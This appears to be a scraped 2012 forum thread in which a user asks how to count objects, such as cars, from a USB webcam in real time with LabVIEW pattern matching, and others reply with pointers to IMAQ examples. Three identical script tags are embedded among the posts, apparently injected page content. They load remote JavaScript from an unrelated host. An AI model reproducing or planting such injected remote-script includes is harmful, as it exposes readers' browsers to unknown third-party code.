09-18-2012 12:38 PM
dear
i have some problem about counting object in webcam camera...
in my aplications i will make project in image recognition and counting it object, in the final project, image was detected can be counting...how method is used to counting of object in real time that use webcam camera..
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>09-19-2012 04:27 PM
Hello Kurniawan,
Can you clarify what your question is?
If you need more additional info on a VI you're using, you can hit "ctrl+h" to open the context help, and then hover over the VI you need more info on. Then you can select "Detailed Help" to open up a more detailed description.
09-20-2012 11:22 AM
this is example program. but i can't execution it, because it have error.. in the final of project. how to count of object from usb camera..for example how to many cars in the road with camera sensor then pattern matching object in real time, in the case i am only about counting object
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>09-20-2012 07:57 PM - edited 09-20-2012 07:58 PM
That version is too new for me to open, but have a look at the IMAQ exaples that come with labview.
Alteratively you can have a look at this https://decibel.ni.com/content/docs/DOC-23399 which looks like a basic object tracking example. You should be able to go from there.
Also, what is the error you get?
09-23-2012 01:33 PM
i cann't count object which it was learned
09-23-2012 06:34 PM
So do you just get a count of 0, or do you actally get an error message?
can you post an 8.6 version of your code?